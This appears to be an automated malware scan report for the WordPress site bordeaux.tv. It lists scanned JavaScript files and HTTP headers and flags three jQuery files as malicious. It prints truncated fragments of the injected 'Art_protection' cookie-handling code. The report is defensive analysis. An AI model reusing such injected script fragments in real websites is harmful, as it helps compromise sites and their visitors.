Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bordeaux.tv
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bordeaux.tv/ | 200 OK Content-Length: 76872 Content-Type: text/html | clean |
http://bordeaux.tv/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96697 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( jQuery.noConflict(); Antivirus reports:
| ||
http://bordeaux.tv/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8090 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( Antivirus reports:
| ||
http://bordeaux.tv/wp-content/plugins/rdv-youtube-playlist-video-player/js/youtube-video-player.jquery.min.js?ver=4.0 | 200 OK Content-Length: 31133 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/plugins/rdv-youtube-playlist-video-player/packages/perfect-scrollbar/jquery.mousewheel.js?ver=4.0 | 200 OK Content-Length: 8239 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/plugins/rdv-youtube-playlist-video-player/packages/perfect-scrollbar/perfect-scrollbar.js?ver=4.0 | 200 OK Content-Length: 25038 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/plugins/rdv-youtube-playlist-video-player/js/plugin.js?ver=4.0 | 200 OK Content-Length: 1100 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/plugins/instagram-slider-widget/assets/js/jquery.flexslider-min.js?ver=2.2 | 200 OK Content-Length: 22907 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/themes/videopress/js/jwplayer.js?ver=4.0 | 200 OK Content-Length: 51700 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/themes/videopress/js/modernizr.min.js?ver=4.0 | 200 OK Content-Length: 16308 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/themes/videopress/js/easytabs.min.js?ver=4.0 | 200 OK Content-Length: 10266 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/themes/videopress/js/jquery.fitvid.js?ver=4.0 | 200 OK Content-Length: 3005 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/themes/videopress/js/jquery.easing.1.3.js?ver=4.0 | 200 OK Content-Length: 8987 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://bordeaux.tv/wp-content/themes/videopress/js/jquery.bxslider.min.js?ver=4.0 | 200 OK Content-Length: 20013 Content-Type: application/javascript | clean |
http://bordeaux.tv/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.8 | 200 OK Content-Length: 2080 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bordeaux.tv
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 16:38:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://bordeaux.tv/>; rel=shortlink
Set-Cookie: 90planBAK=R698931959; path=/; expires=Sun, 21-Sep-2014 17:40:15 GMT
Set-Cookie: 90plan=R1560979476; path=/; expires=Sun, 21-Sep-2014 17:40:20 GMT
X-Pingback: http://bordeaux.tv/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: bordeaux.tv
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 16:38:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://bordeaux.tv/>; rel=shortlink
Set-Cookie: 90planBAK=R698931959; path=/; expires=Sun, 21-Sep-2014 17:40:15 GMT
Set-Cookie: 90plan=R1560979476; path=/; expires=Sun, 21-Sep-2014 17:40:20 GMT
X-Pingback: http://bordeaux.tv/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: bordeaux.tv
Referer: http://www.google.com/search?q=bordeaux.tv
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bordeaux.tv
Referer: http://www.google.com/search?q=bordeaux.tv
Result:
The result is similar to the first query. There are no suspicious redirects found.